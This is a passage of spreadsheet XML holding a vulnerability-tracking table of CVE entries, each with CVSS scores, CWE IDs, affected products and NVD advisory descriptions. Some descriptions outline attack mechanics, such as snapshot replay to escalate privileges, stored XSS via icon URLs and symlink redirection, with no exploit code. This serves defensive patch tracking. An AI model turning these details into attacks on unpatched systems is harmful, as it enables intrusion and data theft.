        </is>
      </c>
      <c r="H2926" s="5" t="inlineStr"/>
      <c r="I2926" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2926" s="5" t="inlineStr"/>
      <c r="K2926" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2926" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to manipulate runtime caches and cause a denial of service due to an insecure direct object reference.</t>
        </is>
      </c>
      <c r="M2926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80434</t>
        </is>
      </c>
    </row>
    <row r="2927">
      <c r="A2927" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81383</t>
        </is>
      </c>
      <c r="C2927" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2927" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2927" s="5" t="inlineStr"/>
      <c r="F2927" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2927" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2927" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="I2927" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2927" s="5" t="inlineStr"/>
      <c r="K2927" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="L2927" s="5" t="inlineStr">
        <is>
          <t>Use of incorrectly-resolved name or reference in Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81383</t>
        </is>
      </c>
    </row>
    <row r="2928">
      <c r="A2928" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84003</t>
        </is>
      </c>
      <c r="C2928" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2928" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2928" s="5" t="inlineStr"/>
      <c r="F2928" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2928" s="5" t="inlineStr">
        <is>
          <t>microsoft, node.js</t>
        </is>
      </c>
      <c r="H2928" s="5" t="inlineStr"/>
      <c r="I2928" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2928" s="5" t="inlineStr"/>
      <c r="K2928" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L2928" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by capture-replay in Microsoft Authentication Library (MSAL) for Node.js allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M2928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84003</t>
        </is>
      </c>
    </row>
    <row r="2929">
      <c r="A2929" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84366</t>
        </is>
      </c>
      <c r="C2929" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2929" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2929" s="5" t="inlineStr"/>
      <c r="F2929" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2929" s="5" t="inlineStr">
        <is>
          <t>python, aws</t>
        </is>
      </c>
      <c r="H2929" s="5" t="inlineStr"/>
      <c r="I2929" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2929" s="5" t="inlineStr"/>
      <c r="K2929" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L2929" s="5" t="inlineStr">
        <is>
          <t>Scrapy is a high-level web crawling and scraping framework for Python. Prior to 2.17.0, in scrapy/core/downloader/handlers/s3.py, Scrapy's S3DownloadHandler converts an S3-scheme bucket and key request into a plaintext HTTP request to the corresponding S3 endpoint unless request.meta["is_secure"] is explicitly enabled, then signs and sends the plaintext request with configured AWS credentials. A network attacker who can observe traffic between Scrapy and S3 can read the bucket and key path, AWS Authorization header, X-Amz-Security-Token when temporary credentials are used, S3 object contents, and S3 response headers. An active man-in-the-middle attacker can also modify the plaintext S3 response body, status code, and headers before Scrapy processes them, causing scraped-data poisoning, poisoned exports, HTTP cache poisoning when caching is enabled, or influence over later crawl targets through forged redirects or attacker-controlled links. Users making S3-scheme requests with AWS credentials are affected. This issue is fixed in version 2.17.0.</t>
        </is>
      </c>
      <c r="M2929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84366</t>
        </is>
      </c>
    </row>
    <row r="2930">
      <c r="A2930" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84961</t>
        </is>
      </c>
      <c r="C2930" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2930" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2930" s="5" t="inlineStr"/>
      <c r="F2930" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2930" s="5" t="inlineStr"/>
      <c r="H2930" s="5" t="inlineStr"/>
      <c r="I2930" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2930" s="5" t="inlineStr"/>
      <c r="K2930" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2930" s="5" t="inlineStr">
        <is>
          <t>undici's BalancedPool constructor passes its entire options object through an internal deep-clone that serializes and reparses the value as JSON. Because JSON cannot represent functions, any function-valued TLS option, such as a caller-supplied checkServerIdentity callback or a custom connector inside the connect option, is silently discarded before it reaches the TLS layer. As a result a peer whose certificate the application's custom checkServerIdentity was written to reject, but which still passes Node's default hostname and chain checks, is accepted when reached through BalancedPool. The Client, Pool, and Agent dispatchers are not affected because they extract the connect and tls options before cloning. This affects undici versions from 7.24.1 up to 7.29.1 and from 8.0.0 up to 8.10.2, and only when the application supplies a function-valued connect or tls option to BalancedPool. Users should upgrade to undici 7.29.1 or 8.10.2.</t>
        </is>
      </c>
      <c r="M2930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84961</t>
        </is>
      </c>
    </row>
    <row r="2931">
      <c r="A2931" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85152</t>
        </is>
      </c>
      <c r="C2931" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2931" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2931" s="5" t="inlineStr"/>
      <c r="F2931" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2931" s="5" t="inlineStr"/>
      <c r="H2931" s="5" t="inlineStr"/>
      <c r="I2931" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2931" s="5" t="inlineStr"/>
      <c r="K2931" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L2931" s="5" t="inlineStr">
        <is>
          <t>undici 8.10.0 omits the destination origin from the cache and request-deduplication keys when the cache or deduplicate interceptor is composed directly onto a Client or Pool. Because the internal cache key falls back to an empty origin string, a cacheable or in-flight response from one upstream origin is returned for a request to a different, trusted origin whenever the method, path, and relevant headers match, which permits cross-origin information disclosure and persistent cache poisoning. The reporter demonstrated a full authentication bypass in which a JWT signed with an attacker-controlled key was accepted as belonging to a trusted issuer, and the trusted origin was never contacted. This is a regression introduced in 8.10.0 and affects undici versions from 8.10.0 up to 8.10.2. Applications using an Agent, which carries the origin in its dispatch options, are not affected. Users should upgrade to undici 8.10.2.</t>
        </is>
      </c>
      <c r="M2931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85152</t>
        </is>
      </c>
    </row>
    <row r="2932">
      <c r="A2932" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85525</t>
        </is>
      </c>
      <c r="C2932" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2932" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2932" s="5" t="inlineStr"/>
      <c r="F2932" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2932" s="5" t="inlineStr">
        <is>
          <t>node.js, python</t>
        </is>
      </c>
      <c r="H2932" s="5" t="inlineStr"/>
      <c r="I2932" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2932" s="5" t="inlineStr"/>
      <c r="K2932" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-347</t>
        </is>
      </c>
      <c r="L2932" s="5" t="inlineStr">
        <is>
          <t>Improper OCSP response validation in the Snowflake Python, Go, JDBC, and Node.js drivers allowed a revoked TLS certificate to be accepted as valid, because OCSP responses were not reliably bound to the certificate being validated and definitive verification failures were treated as transient. A man-in-the-middle attacker holding a revoked certificate and its private key for a Snowflake or stage hostname could cause the driver to establish a TLS session to the attacker-controlled endpoint anyway, allowing the attacker to read and modify data transmitted within that connection. Successful exploitation requires that on-path position and the corresponding private key, and impact is limited to data carried within the intercepted connection. The fix is available in Snowflake Connector for Python v4.7.3, Snowflake Go Driver v2.2.0, Snowflake JDBC Driver v4.3.4 (including the snowflake-jdbc-fips and snowflake-jdbc-thin), and Snowflake Node.js Driver v3.3.0. Users must manually upgrade.</t>
        </is>
      </c>
      <c r="M2932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85525</t>
        </is>
      </c>
    </row>
    <row r="2933">
      <c r="A2933" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86166</t>
        </is>
      </c>
      <c r="C2933" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2933" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2933" s="5" t="inlineStr"/>
      <c r="F2933" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2933" s="5" t="inlineStr"/>
      <c r="H2933" s="5" t="inlineStr"/>
      <c r="I2933" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2933" s="5" t="inlineStr"/>
      <c r="K2933" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-120</t>
        </is>
      </c>
      <c r="L2933" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Tenda HG10 300001138. This issue affects the function formWanRedirect of the file /boaform/formWanRedirect of the component Boa Web Server. Executing a manipulation of the argument if can lead to buffer overflow. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="M2933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86166</t>
        </is>
      </c>
    </row>
    <row r="2934">
      <c r="A2934" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86187</t>
        </is>
      </c>
      <c r="C2934" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2934" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2934" s="5" t="inlineStr"/>
      <c r="F2934" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2934" s="5" t="inlineStr"/>
      <c r="H2934" s="5" t="inlineStr"/>
      <c r="I2934" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J2934" s="5" t="inlineStr"/>
      <c r="K2934" s="5" t="inlineStr">
        <is>
          <t>CWE-330</t>
        </is>
      </c>
      <c r="L2934" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo generates passwords for external-login accounts using rand() instead of a cryptographic generator, producing only 31-bit integers. Attackers with access to password hashes can recover plaintext passwords in minutes through offline brute-force attacks due to unsalted MD5-based hashing.</t>
        </is>
      </c>
      <c r="M2934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86187</t>
        </is>
      </c>
    </row>
    <row r="2935">
      <c r="A2935" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86746</t>
        </is>
      </c>
      <c r="C2935" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2935" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2935" s="5" t="inlineStr"/>
      <c r="F2935" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2935" s="5" t="inlineStr"/>
      <c r="H2935" s="5" t="inlineStr"/>
      <c r="I2935" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2935" s="5" t="inlineStr"/>
      <c r="K2935" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2935" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 contains an authorization bypass vulnerability in Livewire components that enforce authorization only at the route level, not within component lifecycle methods. Attackers with a valid authenticated session can replay signed component snapshots via POST /livewire/update to invoke protected methods and escalate privileges, including creating OAuth clients, minting personal access tokens, and accessing sensitive admin data.</t>
        </is>
      </c>
      <c r="M2935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86746</t>
        </is>
      </c>
    </row>
    <row r="2936">
      <c r="A2936" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87812</t>
        </is>
      </c>
      <c r="C2936" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2936" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2936" s="5" t="inlineStr"/>
      <c r="F2936" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2936" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2936" s="5" t="inlineStr"/>
      <c r="I2936" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2936" s="5" t="inlineStr"/>
      <c r="K2936" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2936" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a stored cross-site scripting vulnerability in Bazaar package cards where the iconURL metadata is inserted directly into HTML img src attributes without escaping. Attackers can inject malicious URLs with event handlers that execute JavaScript in the authenticated SiYuan origin when users view Bazaar listings, enabling API requests and application state manipulation.</t>
        </is>
      </c>
      <c r="M2936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87812</t>
        </is>
      </c>
    </row>
    <row r="2937">
      <c r="A2937" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89161</t>
        </is>
      </c>
      <c r="C2937" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2937" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2937" s="5" t="inlineStr"/>
      <c r="F2937" s="5" t="inlineStr"/>
      <c r="G2937" s="5" t="inlineStr"/>
      <c r="H2937" s="5" t="inlineStr"/>
      <c r="I2937" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2937" s="5" t="inlineStr"/>
      <c r="K2937" s="5" t="inlineStr">
        <is>
          <t>CWE-590</t>
        </is>
      </c>
      <c r="L2937" s="5" t="inlineStr">
        <is>
          <t>In PCRE2 before 10.48, pcre2_jit_match mishandles a previously copied subject being passed in as a context. An incorrect free operation can occur.</t>
        </is>
      </c>
      <c r="M2937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89161</t>
        </is>
      </c>
    </row>
    <row r="2938">
      <c r="A2938" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9697</t>
        </is>
      </c>
      <c r="C2938" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2938" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2938" s="5" t="inlineStr"/>
      <c r="F2938" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2938" s="5" t="inlineStr"/>
      <c r="H2938" s="5" t="inlineStr">
        <is>
          <t>nodejs:undici</t>
        </is>
      </c>
      <c r="I2938" s="5" t="inlineStr">
        <is>
          <t>2026-06-17</t>
        </is>
      </c>
      <c r="J2938" s="5" t="inlineStr"/>
      <c r="K2938" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2938" s="5" t="inlineStr">
        <is>
          <t>Impact:
undici's ProxyAgent silently drops the requestTls option when configured with a SOCKS5 proxy URI (socks5:// or socks://). The target HTTPS connection through the SOCKS5 tunnel falls back to Node's default trust store, ignoring user-configured ca, cert, key, rejectUnauthorized, and servername settings.
Applications that pin to an internal or corporate CA via requestTls.ca will, when their proxy URI is SOCKS5, get the default Mozilla CA bundle as the trust anchor instead. Any cert signed by any publicly-trusted CA for the target hostname is accepted, breaking the intended pin and enabling MITM read and tamper of the HTTPS exchange.
Affected applications are those that use undici's ProxyAgent (or Socks5ProxyAgent directly) with SOCKS5 AND rely on requestTls for TLS scope restriction. The bug was introduced in undici 7.23.0 when SOCKS5 support was added.
Patches:
Upgrade to undici v7.28.0 or v8.5.0.
Workarounds:
No workaround is available within the SOCKS5 path. If a SOCKS5 proxy with TLS scope restriction is required and an upgrade is not yet possible, route the traffic through an HTTP-proxy ProxyAgent instead, where requestTls is honored correctly.</t>
        </is>
      </c>
      <c r="M2938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9697</t>
        </is>
      </c>
    </row>
    <row r="2939">
      <c r="A2939" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2939" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15679</t>
        </is>
      </c>
      <c r="C2939" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2939" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2939" s="5" t="inlineStr"/>
      <c r="F2939" s="5" t="inlineStr"/>
      <c r="G2939" s="5" t="inlineStr"/>
      <c r="H2939" s="5" t="inlineStr"/>
      <c r="I2939" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2939" s="5" t="inlineStr"/>
      <c r="K2939" s="5" t="inlineStr">
        <is>
          <t>CWE-258</t>
        </is>
      </c>
      <c r="L2939" s="5" t="inlineStr">
        <is>
          <t>Under certain circumstances such as reset to factory default operation, the BMC root account is made active without a password.</t>
        </is>
      </c>
      <c r="M2939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15679</t>
        </is>
      </c>
    </row>
    <row r="2940">
      <c r="A2940" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2940" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-54518</t>
        </is>
      </c>
      <c r="C2940" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2940" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2940" s="5" t="inlineStr"/>
      <c r="F2940" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2940" s="5" t="inlineStr"/>
      <c r="H2940" s="5" t="inlineStr"/>
      <c r="I2940" s="5" t="inlineStr">
        <is>
          <t>2026-05-15</t>
        </is>
      </c>
      <c r="J2940" s="5" t="inlineStr"/>
      <c r="K2940" s="5" t="inlineStr">
        <is>
          <t>CWE-1189, CWE-1220</t>
        </is>
      </c>
      <c r="L2940" s="5" t="inlineStr">
        <is>
          <t>Improper isolation of shared resources within the CPU operation cache on Zen 2-based products could allow an attacker to corrupt instructions executed at a different privilege level, potentially resulting in privilege escalation.</t>
        </is>
      </c>
      <c r="M2940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-54518</t>
        </is>
      </c>
    </row>
    <row r="2941">
      <c r="A2941" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11837</t>
        </is>
      </c>
      <c r="C2941" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2941" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2941" s="5" t="inlineStr"/>
      <c r="F2941" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2941" s="5" t="inlineStr"/>
      <c r="H2941" s="5" t="inlineStr"/>
      <c r="I2941" s="5" t="inlineStr">
        <is>
          <t>2026-06-10</t>
        </is>
      </c>
      <c r="J2941" s="5" t="inlineStr"/>
      <c r="K2941" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2941" s="5" t="inlineStr">
        <is>
          <t>A local privilege escalation vulnerability was found in the ansible.posix authorized_key module. The module's keyfile() function uses os.chown() instead of os.lchown() and opens files without O_NOFOLLOW when managing SSH authorized keys. An unprivileged local user can pre-stage symbolic links in their ~/.ssh directory to redirect file ownership changes to arbitrary system paths when an operator runs the authorized_key task as root, leading to local privilege escalation.</t>
        </is>
      </c>
      <c r="M2941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11837</t>
        </is>
      </c>
    </row>
    <row r="2942">
      <c r="A2942" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13201</t>
        </is>
      </c>
      <c r="C2942" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2942" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2942" s="5" t="inlineStr"/>
      <c r="F2942" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2942" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H2942" s="5" t="inlineStr">
        <is>
          <t>kubevirt:kubevirt, redhat:openshift_virtualization</t>
        </is>
      </c>
      <c r="I2942" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J2942" s="5" t="inlineStr"/>
      <c r="K2942" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="L2942" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in KubeVirt's safepath package used by virt-handler. The OpenAtNoFollow function uses O_PATH|O_NOFOLLOW to obtain a file descriptor to a path leaf, but downstream operations resolve the path via /proc/self/fd/N using link-following syscalls. When the leaf is a symlink, the kernel dereferences it, defeating the intended no-follow protection. An attacker with access to a virt-launcher pod can exploit this to redirect virt-handler's IPC socket connections, including the notify socket used for VM domain lifecycle events. By hijacking this socket, the attacker can inject arbitrary domain events into virt-handler, causing it to take incorrect lifecycle actions, corrupt VM state in the Kubernetes API, or crash — resulting in sustained denial of VM management services for all virtual machines on the affected node. Additionally, the same symlink following flaw allows virt-handler to apply file ownership or permission changes to unintended host paths.</t>
        </is>
      </c>
      <c r="M2942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13201</t>
        </is>
      </c>
    </row>
    <row r="2943">
      <c r="A2943" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15431</t>
        </is>
      </c>
      <c r="C2943" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2943" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2943" s="5" t="inlineStr"/>
      <c r="F2943" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2943" s="5" t="inlineStr"/>
      <c r="H2943" s="5" t="inlineStr"/>
      <c r="I2943" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2943" s="5" t="inlineStr"/>
      <c r="K2943" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="L2943" s="5" t="inlineStr">
        <is>
          <t>A potential security vulnerability has been identified in the HP Support
 Assistant for versions prior to 9.53.2.0. The vulnerability
               could potentially allow a local attacker to escalate 
privileges due to insufficient access controls.</t>
        </is>
      </c>
      <c r="M2943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15431</t>
        </is>
      </c>
    </row>
    <row r="2944">
      <c r="A2944" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18058</t>
        </is>
      </c>
      <c r="C2944" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2944" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2944" s="5" t="inlineStr"/>
      <c r="F2944" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2944" s="5" t="inlineStr"/>
      <c r="H2944" s="5" t="inlineStr"/>
      <c r="I2944" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J2944" s="5" t="inlineStr"/>
      <c r="K2944" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2944" s="5" t="inlineStr">
        <is>
          <t>The mobile Smart Connect dashboard UI was subject to manipulation
by 3rd party apps. When paired with a phishing attack, this manipulation could
result in escalated privileges of an attacker within the system.</t>
        </is>
      </c>
      <c r="M2944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18058</t>
        </is>
      </c>
    </row>
    <row r="2945">
      <c r="A2945" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18755</t>
        </is>
      </c>
      <c r="C2945" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2945" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2945" s="5" t="inlineStr"/>
      <c r="F2945" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2945" s="5" t="inlineStr"/>
      <c r="H2945" s="5" t="inlineStr"/>
      <c r="I2945" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2945" s="5" t="inlineStr"/>
      <c r="K2945" s="5" t="inlineStr">
        <is>
          <t>CWE-428</t>
        </is>
      </c>
      <c r="L2945" s="5" t="inlineStr">
        <is>
          <t>A DLL hijacking vulnerability in GeoVision GV-ASManager allows a local attacker with write access to an unsafe search directory to execute arbitrary code. By placing a crafted dynamic-link library (DLL) file into the application search path prior to the legitimate library, the malicious code is loaded and executed under the security privileges of the GV-ASManager process.</t>
        </is>
      </c>
      <c r="M2945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18755</t>
        </is>
      </c>
    </row>
    <row r="2946">
      <c r="A2946" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28613</t>
        </is>
      </c>
      <c r="C2946" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2946" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2946" s="5" t="inlineStr"/>
      <c r="F2946" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2946" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2946" s="5" t="inlineStr"/>
      <c r="I2946" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2946" s="5" t="inlineStr"/>
      <c r="K2946" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2946" s="5" t="inlineStr">
        <is>
          <t>In initAppLinkTypeAndIntent of ChannelImpl.java, there is a possible launch an arbitrary intent due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="M2946" s="6" t="inlineStr">
